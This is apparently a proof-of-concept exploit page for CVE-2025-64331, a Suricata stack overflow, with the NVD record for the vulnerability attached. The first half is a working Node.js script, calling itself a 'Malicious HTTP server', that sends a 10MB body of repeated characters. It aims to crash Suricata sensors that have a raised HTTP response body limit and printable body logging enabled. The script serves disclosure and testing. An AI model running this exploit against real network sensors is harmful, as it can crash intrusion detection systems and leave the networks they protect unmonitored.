CVE-2025-64331

// CVE-2025-64331 PoC - Suricata HTTP Body Stack Overflow // Target: Suricata < 7.0.13 or < 8.0.2 with custom http.response.body-limit // Author: Security Researcher const http = require('http'); // Generate large payload with printable characters function generateLargePayload(size) { return 'A'.repeat(size); } const server = http.createServer((req, res) => { // Send large HTTP response to trigger stack overflow // This PoC assumes Suricata is configured with: // - http.response.body-limit: high value (e.g., 100mb) // - http-body-printable: enabled const largePayload = generateLargePayload(10 * 1024 * 1024); // 10MB res.writeHead(200, { 'Content-Type': 'text/html', 'Content-Length': largePayload.length }); res.end(largePayload); }); server.listen(8080, '0.0.0.0', () => { console.log('Malicious HTTP server running on port 8080'); console.log('Waiting for Suricata to connect and process large HTTP response...'); }); // Note: This PoC requires specific Suricata configuration to be vulnerable: // 1. Set http.response.body-limit to a high value in suricata.yaml // 2. Enable http-body-printable logging in eve-log config // The default configuration is NOT vulnerable as body logging is disabled

{"cve": {"id": "CVE-2025-64331", "sourceIdentifier": "[email protected]", "published": "2025-11-26T23:15:48.263", "lastModified": "2025-12-08T19:30:34.790", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. Prior to versions 7.0.13 and 8.0.2, a stack overflow can occur on large HTTP file transfers if the user has increased the HTTP response body limit and enabled the logging of printable http bodies. This issue has been patched in versions 7.0.13 and 8.0.2. A workaround for this issue involves using default HTTP response body limits and/or disabling http-body-printable logging; body logging is disabled by default."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.13", "matchCriteriaId": "AA4D86E3-44A3-4B0B-9CF4-9FC88091D3C1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.2", "matchCriteriaId": "C93A731C-19AD-4067-B28C-17164C2D981D"}]}]}], "references": [{"url": "https://github.com/OISF/suricata/security/advisories/GHSA-v32w-j79x-pfj2", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}